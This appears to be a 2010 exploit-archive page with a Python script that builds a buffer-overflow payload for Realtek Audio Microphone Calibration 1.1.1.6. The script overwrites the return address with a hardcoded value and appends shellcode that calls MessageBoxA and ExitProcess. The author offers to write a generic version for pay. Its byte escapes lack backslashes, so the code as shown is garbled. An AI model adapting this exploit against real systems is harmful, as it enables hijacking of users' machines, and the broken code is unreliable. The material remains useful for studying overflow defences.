Realtek Audio Microphone Calibration 1.1.1.6 Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Realtek Audio Microphone Calibration 1.1.1.6 Exploit
# Published : 2010-11-14
# Author : BraniX
# Previous Title : Realtek HD Audio Control Panel 2.1.3.2 Exploit
# Next Title : Realtek Audio Control Panel 1.0.1.65 Exploit

# done by BraniX <branix@hackers.org.pl>
# www.hackers.org.pl
# found: 2010.08.24
# tested on: Windows XP SP3 Home Edition

# App. has classic buffer overflow vulnerability
# it can be triggered by passing too long argument 
# as a startup parameter. Shellcode can by run via classic
# ret overwrite or SEH Handler overwrite ... so it's a mini-combo ;)

# Ps. If you need generic exploit ...
# (no hardcoded VA'a), write it yourself ;) or 'donate few' $$$ 
# we will c0de it for You ^^

filepath = "C:\ShellCode\MicCal 1.1.1.6 - Exploit.bin"
f = open(filepath, "wb")

# dummy data
f.write('x90' * 340)

# overwrite ret
f.write('xD7x30x9Dx7C')
f.write("[BraniX]")
f.write('A' * 8)

# start shellcode
f.write('x83xECx08')         # sub esp,8
f.write('x88x04x24')         # mov byte ptr [esp], al
f.write('x83xECx08')         # sub esp,8

f.write('x54')                 # push esp
f.write('x5B')                 # pop ebx

f.write('x50')                 # push eax
f.write('x53')                 # push ebx
f.write('x53')                 # push ebx
f.write('x50')                 # push eax

f.write('xE8x35x08x27x7E') # call user32.MessageBoxA
f.write('x57')                 # push edi

f.write('xE8x57xCBx6Ex7C') # call kernel32.ExitProcess

f.write('xCC' * 10)            # int 3's

f.close()

print "Done ..."